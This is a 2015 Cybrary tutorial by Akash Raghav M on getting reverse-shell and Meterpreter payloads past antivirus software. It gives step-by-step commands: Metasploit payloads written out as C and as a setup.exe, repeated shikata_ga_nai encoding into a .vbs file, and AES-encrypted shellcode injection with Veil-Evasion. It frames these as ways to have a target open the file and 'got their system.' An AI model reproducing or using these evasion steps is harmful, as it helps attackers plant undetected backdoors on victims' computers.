Ready to Start Your Career?

Tutorial: Evading Anti-Virus Software While Hacking

Akash Raghav M's profile image

By: Akash Raghav M

June 22, 2015

Tutorial: Evading Anti-Virus Software While Hacking - CybraryHello,When it comes to " hacking " into our target's system, where most of us all fail is evading their Anti-Virus (AV).In this tutorial, I'll be teaching you various ways to actually by-pass the AV, so you can easily have a meterpreter session running into your target's system without the Anti-Virus flagging your software.AV software companies generally develop their software to look for a "signature" of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database. when it next encounters that malware, the AV software alerts the computer owner. First, the Prerequisites:1. Kali Linux2. A Quick Scanning of the target's AV (what AV are they using, etc.) Let's get started!METHOD 1: Changing the Payload into a C ProgramIn this method, we're going to exploit the  target's system by changing our Metasploit's Payload into a C Language Payload so that the AV wont flag it as suspicious.STEP 1 : Open up Kali and run msfconsole  STEP 2 : Generate an exploit in CWe're going to generate an exploit in C language:msfpayload windows/shell/reverse_tcp LHOST= LPORT=4441 C Notice I've appended the command with a capital " C ". This C tells the console to generate this payload in C Language. Once we've done that, we'd get similar output to this: STEP 3 : Generating a Binary Code Finally, we need to generate a binary executable for the shellcode, which we can use in our client-side attack:msfpayload windows/shell/reverse_tcp LHOST= X > setup.exeWe've created an executable file by using the X option, sent this file to the current folder and named the file setup.exe.We can use this new payload in a client-side attack. The target's AV software will unlikely have a signature for it, allowing us to stealthily place this backdoor/listener on their system. METHOD 2: Encoding our PayloadWe're going to change our signature by encoding it. So, lets get started.STEP 1: Fire up Kali and run msfconsole STEP 2: Using msfencodeLet's run msfencode -l to view the available list of encoders for us to useWe can see a lot of encoders for us to use.Fourth from the bottom, you can see an encoder named " shikata_ga_nai " .Note: It's rated "excellent" and it's a "Polymorphic XOR Additive Feedback Encoder ". Le's use that one.Whats shikata_ga_nai? This Japanese phrase translates to "nothing can be done about it." Great name for an encoder, huh? Further, it's an additive XOR polymorphic encoder. This means that it will change its shape/signature (polymorphic) by using an XOR encrypting scheme. XOR is far from a perfect encryption scheme, but it's efficient and can generate multiple shapes/signatures quickly that can be decrypted by the code itself once it arrives at the target. STEP 3: Re-coding our Payload with the encoderLet's use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. In MSF we type:msfpayload windows/shell/reverse_tcp LHOST= R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/cybrary_it.vbsHere, " | " means generate a payload with the following extra parameters or rules etc.:msfencode -e x86/shikata_ga_nai -c 20 -t vbs means, re-encode that payload with skikata_ga_nai and run it 20 times (-c 20), and then encode it to look like a .vbs script .Finally, save it in root with file name cybrary_it.vbs When we check our root folder, we find this:It's just a matter of minutes in sending the file to our target and have him open it, and boom, we got their system.  METHOD 3: Using Veil-EvasionIn this final method (of this tutorial - I cant post all 50 methods, LOL) we're going to evade the AV one last time by using Veil-Evasion.Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways. STEP 1 : Installing Veil-EvasionFirst, we're going to do is install this!Type:root@kali > apt-get install veil-evasion STEP 2: Opening Veil EvasionTo open our recently installed Veil - Evasion just type:root@kali > veil-evasion When we type that, we get this :Veil will now begin its installation.It will ask you whether you want to install dependencies; type " Y " for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button. Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually,  you will arrive at the screen below. We're ready to use Veil-Evasion to create a nearly undetectable payload. STEP 3 : Creating an EXE Payload  Let's type "list" as this will list all of the payloads that Veil-Evasion can work with.  STEP 4 : Choosing a PayloadIn this case, let's use the ruby/meterpreter/rev_tcp, or number 44.Let's type: > use 44When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.  We'll need to set LHOST and LPORT:> set LHOST> set LPORT 4444Of course, use the appropriate IP address and port for your circumstances. Next, we need to tell Veil-Evasion to generate the executable.> generate          As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named "newpayload.exe" .  STEP 5 : Generating an encrypted Payload to bypass AVNext, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we'll use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt.This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.This is number 32 on our payload list, so type: > info 32It then returns info on this payload, as seen below.This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices. Next, let's tell Veil-Evasion we want to use this payload.> use 32Here, we have the option to change the default options if we care to. For now, let's leave the default options as they are.Then, let's tell Veil-Evasion we want to generate this encrypted payload> generateWhen we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT.  When we finish entering the appropriate information for our payload, it will begin to generate the shellcode.This can take few minutes, so be patient. Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload." Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below. Summary:There are a lot of ways you can bypass an AV. These are the most used methods by me and my team. If you are stuck in any method or if you have any suggestions/comments/queries, feel free to message me ;) -- xMidnightSnowx
Schedule Demo